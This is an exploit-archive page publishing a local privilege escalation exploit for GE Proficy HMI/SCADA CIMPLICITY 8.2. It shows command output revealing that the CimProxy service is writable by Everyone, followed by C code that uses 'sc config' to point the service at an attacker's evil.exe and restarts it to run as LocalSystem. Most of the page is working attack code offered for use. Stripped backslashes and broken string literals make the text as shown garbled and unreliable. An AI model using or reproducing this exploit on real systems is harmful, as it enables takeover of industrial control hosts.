Home / os / winmobile

GE Proficy HMI/SCADA CIMPLICITY 8.2 Local Privilege Escalation

Posted on 09 July 2016

/* # Exploit Title: GE Proficy HMI/SCADA CIMPLICITY 8.2 Local Privilege Escalation Exploit(0 day) # Vulnerability Discovery and Exploit Author: Zhou Yu # Email: <504137480@qq.com> # Version: 8.2 # Tested on: Windows 7 SP1 X32 # CVE : None Vulnerability Description: SERVICE_CHANGE_CONFIG Privilege Escalation C:UserslenovoDesktopAccessChk>accesschk.exe -q -v -c CimProxy CimProxy Medium Mandatory Level (Default) [No-Write-Up] RW Everyone SERVICE_ALL_ACCESS C:UserslenovoDesktopAccessChk>sc qc CimProxy [SC] QueryServiceConfig �ɹ� SERVICE_NAME: CimProxy TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:Program FilesProficyProficy CIMPLICITYexeCim Proxy.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : CIMPLICITY Proxy Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem Usage: Put evil.exe and the exploit in the same folder and then run the exploit. */ #include <windows.h> #include <stdio.h> #include <string.h> void main() { char szPath[MAX_PATH]; char *t; GetModuleFileName(NULL,szPath,MAX_PATH); t = strrchr(szPath, 0x5C); t[0] = '\'; t[1] = ''; strcat(szPath,"evil.exe""); char t1[] = ""cmd.exe /c "; char payload[] = "sc config CimProxy binPath= "; strcat(t1,szPath); strcat(payload,t1); system(payload); //stop service printf("stop service! "); system("net stop CimProxy"); //start service printf("start service! "); system("net start CimProxy"); }

 

TOP